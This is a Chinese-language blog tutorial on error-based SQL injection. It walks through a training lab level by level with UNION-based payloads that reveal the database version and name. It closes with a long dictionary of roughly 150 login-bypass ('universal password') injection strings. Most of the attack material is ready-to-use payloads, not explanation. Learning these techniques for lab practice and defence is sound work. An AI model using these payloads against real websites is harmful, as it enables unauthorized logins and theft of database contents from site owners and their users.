SQL注入-显错注入

目录

SQL注入

数据库语句

流程

靶场演示

万能密码漏洞 

万能密码字典


SQL注入

什么是SQL注入 : 用户输入的内容被浏览器当做数据库语句进行执行。

关键点:我们一定要输入[数据库语句]

我们输入【数据库语句】,如果这个[网站执行了],就说明这个网站,存在数据库注入漏洞。

数据库语句

select 列名 from 表名 where 条件

select 查询
from  来自 
where 当···条件成立的时候

流程

第一步:判断网站是否存在漏洞
    and 1=1 --> 条件成立,网页有内容
    and 1=2 --> 条件不成立,网页没有内容
        ==>  网站存在SQL注入漏洞。

第二步:判断字段(列)数 ,order by ,排序。
    字段 = 列 。
    order by 1 --> 网页有内容,说明表里面有1列
    order by 2 --> 网页有内容,说明表里面有2列
    order by 3 --> 网页有内容,说明表里面有3列
    order by 4 --> 网页没有内容,说明表里面没有4列                
                ---> 只有3列。


Ps:判断一个网站是否存在数据库注入漏洞,也可以使用order by 判断。

第三步:判断回显点。 union ,能够同时执行两条数据库语句。

关键点:必须保证列数一致。
回显点:能够将我们输入的数据库语句执行,并且将结果显示在网页上。
    
    and 1=2 union select 1,222222,333333

第四步:查数据
    version() # 函数,作用:查询版本号的
    database() # 函数,作用:查库名的。

    and 1=2 union select 1,version(),database()

靶场演示(掌控安全学院SQL注入靶场

第一关:select * from user where id=1

输入  and 1=1

网页有内容

输入 and 1=2

网页没有内容

输入 order by 1

网页有内容

输入 order by 1

网页有内容

输入 order by 3

网页有内容

输入 order by 4

网页没有内容

  输入 and 1=2 union select 1,2,3

   输入and 1=2 union select 1,222222,333333

输入and 1=2 union select 1,version(),database()


第二关:select * from user where id='1'
    输入and 1=1: select * from user where id='1 and 1=1'
    输入and 1=2:    select * from user where id='1 and 1=2'
    输入' :               select * from user where id='1''
    输入' -- q :        select *from user where id='1' -- q'    
    输入' and 1=1 -- q  select *from user where id='1 ' and 1=1 -- q' 

页面有内容

输入' and 1=2 -- q  select *from user where id='1' and 1=2 -- q' 

页面没内容

输入' order by 3 -- q 

页面有内容

输入' order by 4 -- q 

网页没有内容

 第三关:select * from user where id= ('1')
    输入') and 1=2 union select 1,2,3 -- q

 

 

 

 第四关:select *from user where id=("1")
    输入 ") #  
# =  %23

'') and 1=2 union select 1,2,3 -- q

 

万能密码漏洞 

本质:sql注入漏洞引起的。

select *from user where username ='' and password=''

输入 ' or 2-1=1 -- qwe

select *from user where username ='' or 2-1=1 -- qwe' and password=''

and 前后两条件,都成立,才算成立    
    1=1 and 2=2     
or 前后两条件,只要有一个条件成立,那么就都成立。
    1=1 or 1=2  (成立)

输入admin,123456

输入 ' or 2-1=1 -- qwe

 

 

万能密码字典


"or "a"="a
'.).or.('.a.'='.a 
or 1=1--
'or 1=1 -- q
a'or' 1=1--
"or 1=1--
'or.'a.'='a
"or"="a'='a
'or''='
'or'='or'
admin'or 1=1#
admin'/*
aaaa*/'
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--
"or "a"="a
 ')or('a'='a
or 1=1–
'or 1=1–
a'or' 1=1–
"or 1=1–
'or'a'='a
"or"="a'='a
'or"='
'or'='or'
1 or '1'='1'=1
1 or '1'='1′ or 1=1
'OR 1=1%00
"or 1=1%00
'xor
admin' or 'a'='a
'or 1=1/*
something
'OR '1'='1
1'or'1'='
admin' OR 1=1/*
' or 1=1#
'=0#
'>-1#
'<1#
1'<99#
'=0=1#
'<=>0#
'=0=1=1=1=1=1#
'=1<>1#
'<>1#
1'<>99999#
'!=2!=3!=4#
'|0#
'&0#
'^0#
'<<0#
'>>0#
'&''#
'%11&1#
'&1&1#
'|0&1#
'<<0|0#
'<<0>>0#
'*9#
'/9#
'%9#
'+0#
'-0#
'+2+5-7#
'+0+0-0#
'-0-0-0-0-0#
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78#
'/**/+/**/0#
'-----0#
'+++0+++++0*0#
'<hex(1)#
'=left(0x30,1)#
'=right(0,1)#
'!=curdate()#
'-reverse(0)#
'=ltrim(0)#
'<abs(1)#
'*round(1,1)#
'&left(0,0)#
'*round(0,1)*round(0,1)#
'=upper     (0)#
' <1 and 1#
'xor 1#
'div 1#
'is not null#
admin' order by'
admin' group by'
'like 0#
'between 1 and 1#
'regexp 1#
'='
'<>'1
'>1='
0'='0
'<1 and 1>'
'<>ifnull(1,2)='1
'=round(0,1)='1
'*0*'
'+'
'-'
'+1-1-'
'+(0-0)#
'=0<>((reverse(1))-(reverse(1)))#
'<(8*7)*(6*5)*(4*3)#
'&(1+1)-2#
'>(0-100)#
' or 1=1#
' or '
' || '



 

评论 6 您还未登录,请先 登录 后发表或查看评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:游动-白 设计师:我叫白小胖 返回首页

打赏作者

风过留不留声

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值